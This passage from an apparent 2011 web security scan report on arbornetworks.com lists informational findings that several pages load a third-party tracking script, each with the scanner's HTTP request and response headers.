<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.80. http://www.arbornetworks.com/en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e57b9fb474b87112255a4d9be9bcd9fd; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:52:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.81. http://www.arbornetworks.com/en/asert-arbor-security-engineering-response-team-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/asert-arbor-security-engineering-response-team-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f801899e89a9fde8b12411b0892a1130; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:41 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:41 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:42 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.82. http://www.arbornetworks.com/en/atlas-global-network-threat-analysis-460.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/atlas-global-network-threat-analysis-460.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=483b845480caf13825757682b0239785; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:34 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:34 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:35 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:36 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.83. http://www.arbornetworks.com/en/channel-partners-3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/channel-partners-3.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/channel-partners-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:51:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=aeeb2927168d71237180dbad9ee63128; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:44 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:44 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:45 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:51:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.84. http://www.arbornetworks.com/en/com-5fcontent/view-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/com-5fcontent/view-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/com-5fcontent/view-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=729dfe8e5c19a0af96d43ff8435a4b49; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:09 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:09 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:10 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.85. http://www.arbornetworks.com/en/com-5fcontent/view-3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/com-5fcontent/view-3.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/com-5fcontent/view-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ecb7056e32288d9cc170631c375c0b34; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:25 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:25 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:26 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.86. http://www.arbornetworks.com/en/contact-us-4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us-4.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/contact-us-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:28 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=08c54c3b2084f52f0621dbf90082a97f; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:28 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:28 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:29 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:30 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.87. http://www.arbornetworks.com/en/contact-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/contact-us.html HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; e585cbcac8f7bba066a55f149566ddd5=-; __utmz=186398841.1296696461.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; e411486dda3a9a212ec0bba8fd7ed343=5e36548abe003c359e3e6d61a215e937; mbfcookie[lang]=en; __utma=186398841.1861161794.1296689848.1296689848.1296696461.2; __utmc=186398841; __utmb=186398841.2.10.1296696461

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 01:39:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=3022831cda34d0d6c74361c68342c68e; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:39:21 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:39:21 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:39:22 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:39:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.88. http://www.arbornetworks.com/en/customer-solution-briefs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/customer-solution-briefs.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/customer-solution-briefs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f7b66a3d1f954eb42a17e42668161295; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.89. http://www.arbornetworks.com/en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=223125452deb4fa188862b1e7e1d100c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:48 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:48 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:49 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:49 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.90. http://www.arbornetworks.com/en/ipv6-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/ipv6-report.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/ipv6-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=4235f47faf294d487cfd850f85d27581; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:06 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:06 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:07 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:52:09 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.91. http://www.arbornetworks.com/en/meet-our-partners.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/meet-our-partners.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/meet-our-partners.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:51:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=56baf30018cc500646e86a5ce1392060; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:02 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:02 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:03 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:51:03 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.92. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-monitoring-security-news-events.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/network-monitoring-security-news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
